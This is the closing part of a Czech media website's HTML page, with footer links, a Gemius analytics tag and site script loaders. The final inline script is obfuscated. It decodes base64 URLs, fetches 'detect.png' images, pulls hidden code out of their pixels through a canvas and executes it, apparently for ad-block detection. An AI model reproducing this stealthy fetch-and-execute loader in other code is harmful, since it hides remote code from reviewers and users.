						<li><a href="https://www.vlmedia.cz/kontakty/redakce.html" target="_blank">Redakce</a></li>
						<li><a href="https://www.vlmedia.cz/kontakty/inzerce" target="_blank">Reklama</a></li>
						<li><a href="https://www.vlmedia.cz/podminky" target="_blank">Všeobecné smluvní podmínky</a></li>
						<li><a href="https://www.vlmedia.cz/podminky/zasady-zpracovani-osobnich-udaju/" target="_blank">Zásady zpracování osobních údajů</a></li>
						<li><a href="https://www.vlmedia.cz/zmena-osobnich-udaju/" target="_blank">Práva subjektů údajů</a></li>
					</ul>
				</div>
		</div>
	</footer>
</div>

	<!-- (C)2000-2011 Gemius SA - gemiusAudience / national-geographic.cz / Ostatni -->
	<script type="text/javascript">
	<!--//--><![CDATA[//><!--
	var pp_gemius_identifier = new String('nF46P0Rmi2U7a5CnJ2CzrrS478wKj07lBxzaUyM2d6z.I7');

	function gemius_pending(i) { window[i] = window[i] || function() {var x = window[i+'_pdata'] = window[i+'_pdata'] || []; x[x.length]=arguments;};};
	gemius_pending('gemius_hit'); gemius_pending('gemius_event'); gemius_pending('pp_gemius_hit'); gemius_pending('pp_gemius_event');
	(function(d,t) {try {var gt=d.createElement(t),s=d.getElementsByTagName(t)[0]; gt.setAttribute('async','async'); gt.setAttribute('defer','defer');
	 gt.src='https://gacz.hit.gemius.pl/xgemius.js'; s.parentNode.insertBefore(gt,s);} catch (e) {}})(document,'script');
	//--><!]]>
	</script>
<div id="tracy-debug"></div>
<script src="https://g.denik.cz/webtemp/jsloader-1f2d19e42892-1569498872.js"></script>
<link rel="stylesheet" type="text/css" href="https://g.denik.cz/webtemp/cssloader-2ec6ac1878c0-video-js-1539344493.css">
<script src="https://g.denik.cz/webtemp/jsloader-9a0e4de4007c-1566990652.js"></script>
<script>
	!function(n,Z){n.btoa;var a=n.atob,t=n[a("YWRiX2RlYnVn")],e=["aHR0cHM6Ly9kM2V5ZDk2MXdpMTBibC5jbG91ZGZyb250Lm5ldC9nZW4vZGV0ZWN0LnBuZw==","aHR0cHM6Ly9kMWRhZW9uYnFjcTBvaC5jbG91ZGZyb250Lm5ldC9nZW4vZGV0ZWN0LnBuZw==","aHR0cHM6Ly9jZG4uZG9wYy5jei9nZW4vZGV0ZWN0LnBuZw=="];function i(){var n=a(e.shift());if(n){var t=new Image;t.onload=function(){var n,t,a,e,i,o,r;n=this,t=Z.createElement("canvas"),a=t.getContext("2d"),e=n.width,i=n.height,(o=t.style).width=t.width=e,o.height=t.height=i,a.drawImage(n,0,0),r=function(n){for(var t="",a=0;a<n.length;a++)(a+1)%4!=0&&n[a]&&(t+=String.fromCharCode(n[a]));return t}(a.getImageData(0,0,e,i).data),new Function(r).call({loader:1,ver:"v0.1.663"})},t.onerror=i,t.crossOrigin="Anonymous",t.src=n}}t&&(e=["L2dlbi9kZXRlY3QucG5n"]),i()}(window,document);
</script>


</body>
</html>
